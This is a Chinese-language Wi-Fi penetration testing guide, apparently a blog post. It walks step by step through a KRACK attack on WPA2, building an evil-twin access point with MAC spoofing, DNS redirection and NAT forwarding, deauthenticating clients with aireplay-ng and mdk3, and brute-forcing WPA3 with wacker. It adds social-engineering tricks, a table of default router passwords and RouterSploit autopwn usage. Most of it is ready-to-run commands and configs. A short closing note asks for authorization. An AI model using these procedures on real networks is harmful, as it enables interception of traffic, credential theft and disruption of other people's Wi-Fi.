无线渗透|Wi-Fi渗透思路
字数 1596 2025-08-06 20:12:41
Wi-Fi渗透测试全面指南
基础知识
WPA2/WPA3概述
- WPA2:WPA的升级版,引入PSK(预共享密钥模式),安全性优于WPA但仍有漏洞
- WPA3:新一代安全协议,增加对字典暴力破解的防护,使用SAE(对等实体验证)取代PSK
- AP:无线网络接入点(如路由器)的统称
硬件要求
- 建议使用支持802.11ac协议的无线网卡
- 通常需要两张或更多网卡进行攻击
WPA2渗透方法
密钥重装攻击(KRACK)
攻击原理
- 利用WPA2四次握手过程中的Nonce重装漏洞
- 通过重放第三次握手包来重置加密密钥
- 最终可解密目标网络中的所有流量
实施步骤
-
启动网卡监听模式
sudo airmong-ng start <device1> -
目标AP信息收集
sudo airodump-ng <device1> -
锁定目标BSSID
sudo airodump-ng <device1> --bssid=<target bssid> -
克隆钓鱼热点
- 更改网卡MAC地址:
sudo ifconfig device2 down sudo macchanger device2 -m <newmac> sudo ifconfig device2 up - 伪造热点:
sudo airmong start wlan2 sudo airbase-ng -e <target SSID> -c <channel> <device2> sudo ifconfig at0 up
- 更改网卡MAC地址:
-
配置网络参数
- 编辑
/etc/network/interfaces:auto at0 iface at0 inet static address 192.168.199.1 netmask 255.255.255.0 - 重启网络服务:
sudo service networking restart
- 编辑
-
配置DHCP服务
- 编辑
/etc/dhcp/dhcpd.conf:subnet 192.168.199.0 netmask 255.255.255.0{ range 192.168.199.100 192.168.199.150; option routers 192.168.199.1; option subnet-mask 255.255.255.0; option domain-name-servers 192.168.178.99; } - 指定DHCP服务网卡:
修改为sudo vi /etc/default/isc-dhcp-serverINTERFACESv4="at0"
- 编辑
-
配置DNS服务
- 编辑
/etc/dnsmasq.conf:resolv-file=/etc/resolv.conf strict-order listen-address=192.168.199.113 address=/baidu.com/192.168.178.99 server=8.8.8.8 server=114.114.114.114
- 编辑
-
设置流量转发
iptables -t nat -A POSTROUTING -s 192.168.199.0/24 -j SNAT --to 192.168.178.99 iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT iptables -A FORWARD -p tcp --syn -s 192.168.199.0/24 -j TCPMSS --set-mss 1356 iptables-save -
强制设备重连
- 使用aireplay-ng:
sudo aireplay-ng -0 0 -a <target AP BSSID> -c <target member MAC> <device1> - 使用mdk3/mdk4:
sudo mdk3 <device> d -s 1000 -b blacklist.txt -c <target channel>
- 使用aireplay-ng:
-
捕获握手包
- 使用Wireshark分析捕获的握手包
- 标记并导出第三次握手包
-
实施攻击
- 使用scapy伪造CSA信标
- 重发第三次握手包
sudo scapy
相关工具
- KRACK攻击POC: https://github.com/vanhoefm/krackattacks-poc-zerokey
- KRACK脚本: https://github.com/vanhoefm/krackattacks-scripts
WPA3攻击方法
使用wacker工具进行字典攻击
-
安装准备
git clone https://github.com/blunderbuss-wctf/wacker.git cd wacker apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev cd wpa_supplicant-2.8/wpa_supplicant/ cp defconfig_brute_force .config make -j4 -
使用wacker
./wacker.py --wordlist <wordlist> --interface <interface> --bssid <BSSID> --ssid <SSID> --freq <freq>
社会工程学方法
- 直接询问:向网络管理员或相关人员询问密码
- 密码泄露工具:使用Wi-Fi万能钥匙等工具获取共享密码
- 二维码扫描:扫描设备生成的Wi-Fi二维码获取密码
路由器后台渗透
常见默认凭证
| 路由器品牌 | 默认用户名 | 默认密码 |
|---|---|---|
| TP-LINK家用 | admin | admin |
| TP-LINK企业级 | admin | admin123456 |
| Tenda | admin | admin |
| 360 | admin | admin |
| 华为 | admin | admin |
| Netcore | guest | guest |
| 小米 | (无) | (无) |
| FAST | admin | admin |
| D-Link | admin | admin |
| PHICOMM | admin | admin |
漏洞利用工具
-
RouterSploit
- 安装:
git clone https://github.com/threat9/routersploit.git cd routersploit pip3 install -r requirements.txt - 使用:
sudo ./rsf.py use scanners/autopwn set target <路由器IP> run
- 安装:
-
在线漏洞资源
- RouterPwn: http://routerpwn.com/
注意事项
- 渗透测试前确保获得合法授权
- 攻击可能造成网络中断,需谨慎操作
- 保持工具和系统更新以支持最新协议
- 实际环境中可能需要结合多种技术手段
- 注意法律风险,仅在授权范围内测试